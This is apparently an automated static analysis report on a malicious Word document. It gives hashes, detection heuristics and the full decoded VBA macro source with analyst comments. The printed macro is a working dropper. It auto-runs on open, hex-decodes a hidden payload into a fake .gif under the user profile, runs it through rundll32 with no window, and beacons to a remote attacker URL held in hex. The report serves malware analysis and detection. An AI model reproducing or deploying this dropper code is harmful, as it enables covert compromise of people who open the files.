Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0f3085db3cac1716…

MALICIOUS

Office (OLE)

998.5 KB Created: 2014-07-14 12:58:00 Authoring application: Microsoft Office Word First seen: 2020-12-25
MD5: 32261fe44c368724593fbf65d47fc826 SHA-1: 98d98abf2fb6b980884fd3333074d9d7088af0a3 SHA-256: 0f3085db3cac1716b8b61eec8e23d07d457a1937e37d5ef32fcf012b6c27fc7e
206 Risk Score

Heuristics 9

  • ClamAV: Doc.Trojan.Xshell-6923080-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xshell-6923080-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    If (ok = True) Then Shell st, 0
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    pth = Environ(s2)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; on its own it does not attribute a downloader or a parser CVE.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2838 bytes
SHA-256: 8c3c266c7e8d4c1283579911bfad2f88346e3031771e1496a2b9292b15a3798a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header of the ThisDocument class module as exported by olevba.
' Nothing else was recovered for this module: no procedures appear here, so the
' auto-exec entry points and the payload routine are in the NewMacros module that follows.

Attribute VB_Name = "NewMacros"
' Standard module NewMacros: holds the two auto-run entry points (Auto_Open, AutoOpen)
' and the private ShowPicture routine they both call.
' Auto-run entry point (Excel-style name). Does nothing itself; it only hands off
' to ShowPicture, which carries the actual behaviour. Duplicated as AutoOpen below so
' the hook fires under either naming convention.
Sub Auto_Open()
    ShowPicture 1
End Sub
' Auto-run entry point recognised by Word: runs when the document is opened with
' macros enabled. Identical to Auto_Open above; both just call ShowPicture.
Sub AutoOpen()
    ShowPicture 1
End Sub































































' ShowPicture — the routine reached from both auto-exec stubs; the name is a decoy.
' Analyst notes (everything below is read off the code itself; the "decodes to"
' values are the plain ASCII of the hex literals, two hex digits per character):
'   1. reads the text of one document section with hidden text included,
'   2. checks that it starts with a 6-character marker,
'   3. writes the hex-encoded body that follows the marker to a file under
'      %USERPROFILE%, then blanks the section so the payload leaves the document,
'   4. launches that file through rundll32 with a hidden window,
'   5. inserts a linked picture from a remote URL (a likely fetch/beacon) and saves.
' Detection leads: WINWORD writing %USERPROFILE%\pic34.gif; rundll32 started with a
' ".gif" path and export name "_dec"; an outbound request for the URL decoded below.
' The parameter "Void" is never used (both callers pass 1). No Option Explicit: s1,
' ind, ij, pth, Ft, Nt, ok, sel, st and s3 are implicit Variants.
Private Sub ShowPicture(Void As Integer)
Dim pik As Integer
Dim pkm As String
' pkm is one double-quote character; used later to wrap the file path in quotes.
pkm = """"
' Index of the document section that carries the hidden payload text.
pik = 24
With ActiveDocument
Dim aaa As String
Dim aab As String
With .Sections(pik)
' Hex of "USERPROFILE" — decoded by the loop below into s2.
s1 = "5553455250524F46494C45"
Dim s2 As String
With .Range
ind = 1
With .TextRetrievalMode
' Hex-decode idiom repeated throughout the routine: take two hex digits, convert
' with CLng("&H..") and append the character. On Error Resume Next is switched on
' here and is never reset, so every later failure in this procedure is silent too.
While (ind < Len(s1))
Dim bt As String
bt = Mid(s1, ind, 2)
Dim tt As Integer
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
' Hidden text is pulled in so the payload can be stored invisibly in the section.
.IncludeHiddenText = True
End With
' Full section text, hidden runs included.
aaa = .Text
' pth = value of %USERPROFILE% (s2 holds "USERPROFILE" at this point).
pth = Environ(s2)
s2 = ""
' Hex of "poiLop" — the 6-character marker expected at the start of the section text.
s1 = "706F694C6F70"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
Ft = s2
s2 = ""
' Hex of "\pic34.gif" — the drop file name (image extension, but executed as a DLL below).
s1 = "5C70696333342E676966"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
' Nt = %USERPROFILE%\pic34.gif
Nt = pth + s2
' First six characters of the section text, compared with the marker.
aab = Mid(aaa, 1, 6)
Dim f As Integer
f = FreeFile()
' The output file is opened (and so created) before the marker is checked, so an
' empty pic34.gif can appear on disk even when nothing is written to it.
Open Nt For Binary As f
DoEvents
If (Ft = aab) Then
ok = True
' Wipes the section text: the encoded payload is removed from the document once read.
.Text = ""
End If
End With
' Payload body: from character 8 to the second-to-last character, i.e. the text after
' the marker plus one separator character, minus the final character.
sel = Mid(aaa, 8, Len(aaa) - 8)
If (ok = True) Then
ind = 1
While (ind < Len(sel))
bt = Mid(sel, ind, 2)
' "&H" + two hex digits; assigning that string to a Byte relies on VBA's implicit
' string-to-number conversion accepting the &H prefix. Bad pairs are skipped silently
' because On Error Resume Next is still active.
bt = "&H" + bt
Dim a As Byte
a = bt
Put #f, , a
ind = ind + 2
Wend
' Marker found somewhere in the body but not at the start: still set ok so the
' launch below happens without a fresh write — presumably a re-run after the text
' was already wiped on a previous open; not confirmed from this code alone.
ElseIf (InStr(1, sel, Ft) > 0 And Len(sel) > 0) Then
ok = True
End If
End With
Close f
s2 = ""
' Hex of "rundll32 " (with trailing space).
s1 = "72756E646C6C333220"
End With
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
s3 = s2
s2 = ""
' Hex of ",_dec" — the export name handed to rundll32.
s1 = "2C5F646563"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
' st = rundll32 "<%USERPROFILE%\pic34.gif>",_dec
st = s3 + pkm + Nt + pkm + s2
' Runs the dropped file as a DLL via rundll32; window style 0 is vbHide (no window).
If (ok = True) Then Shell st, 0
' ip is declared but never used.
Dim ip As String
With ActiveDocument
s2 = ""
' Hex of a remote URL, shown defanged: hxxp://windows[.]mswordupdate17[.]com/spl/image/O102clk.jpg
s1 = "687474703A2F2F77696E646F77732E6D73776F726475706461746531372E636F6D2F73706C2F696D6167652F4F313032636C6B2E6A7067"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
With .Shapes
DoEvents
' Inserts a tiny (3x3) picture linked to the URL rather than embedded, which makes
' Word fetch the remote resource — effectively a network beacon; the fetched
' content is not used anywhere else in this routine.
.AddPicture FileName:=s2, _
LinkToFile:=True, _
SaveWithDocument:=False, _
Left:=-5, _
Top:=5, _
Anchor:=Selection.Range, _
Width:=3, _
Height:=3
' Removes the last shape when more than one exists — presumably to leave the
' document looking unchanged after the fetch; if the new picture is the only shape it stays.
If (.Count > 1) Then
.Item(.Count).Delete
End If
End With
' Saves the document with the hidden payload text already blanked out.
.Save
End With
End Sub